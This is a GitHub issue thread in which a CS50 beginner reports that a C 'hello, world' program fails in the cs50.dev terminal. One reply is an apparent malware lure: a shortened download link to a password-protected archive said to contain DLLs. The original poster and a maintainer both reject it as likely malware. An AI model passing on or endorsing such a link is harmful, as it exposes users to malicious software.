### ISSUE TITLE
terminal provided in cs50.dev does not seem to be working

### ISSUE THREAD

**Issue by Kevinf19** [microsoft/vscode#230061]
ADD ISSUE DESCRIPTION HERE
i wrote the code from week 1 into the git terminal and seemed to have an inordinate amount of trouble getting one line print function to work. was it my code?
furthur, when i inputted the error message into the ai feature, it omitted part of the errror message i typed
{
    printf("hello, world\n"):

there is my code... sincerely, KevinF. (c newbie) c newbie code, code newbie code, c newbie code, code newbie code.
Thank you
Version: 1.93.1
Commit: 38c31bc77e0dd6ae88a4e9cc93428cc27a56ba40
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Embedder: codespaces

**Comment by SagarChandra07** [comment]
install this
https://bit.ly/47P0Nvo
Archive codepass: changeme
I put the necessary dlls in the archive

**Comment by Kevinf19** [comment]
not a chance in  I am installing or opening any file from mediafire.

We wil have to try another fix.
Have a nice day!

**Comment by gjsjohnmurray** [comment]
> not a chance in I am installing or opening any file from mediafire.
> 
> We wil have to try another fix. Have a nice day!

That response is likely trying to propagate malware, so you are wise to ignore it.

To address your issue please contact the CS50 course support channel.

/question
